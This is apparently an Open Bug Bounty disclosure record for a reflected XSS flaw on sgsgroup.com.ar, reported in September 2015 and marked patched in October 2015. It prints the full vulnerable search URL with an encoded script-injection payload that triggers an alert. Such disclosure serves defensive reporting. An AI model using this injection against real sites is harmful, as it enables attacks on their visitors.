Lucene search

K
openbugbountyBesafeCybersecurityOBB:88696
HistorySep 25, 2015 - 12:05 a.m.

sgsgroup.com.ar XSS vulnerability

2015-09-2500:05:00
BesafeCybersecurity
www.openbugbounty.org
7
Vulnerable URL:
http://www.sgsgroup.com.ar/es-ES/SearchResults.aspx?N=4294967125&Ntk;=SI_ES-ES_Argentina&Ntt;=\%22%3E%3Cscript%3Ealert%28%27XSSPOSED%27%29;%3C/script%3E&lb;=&dc;=http
Details:
Description Value
Patched: Yes, at 24.10.2015
Latest check for patch: 24.10.2015 01:25 GMT
Vulnerability type: XSS
Vulnerability status: Publicly disclosed
Alexa Rank 13059835
Google Pagerank 6
VIP website status: No
Check sgsgroup.com.ar SSL connection: (Grade: F)
Coordinated Disclosure Timeline:
Description Value
Vulnerability reported 25 September, 2015 00:05 GMT
Vulnerability existence verified and confirmed 25 September, 2015 00:07 GMT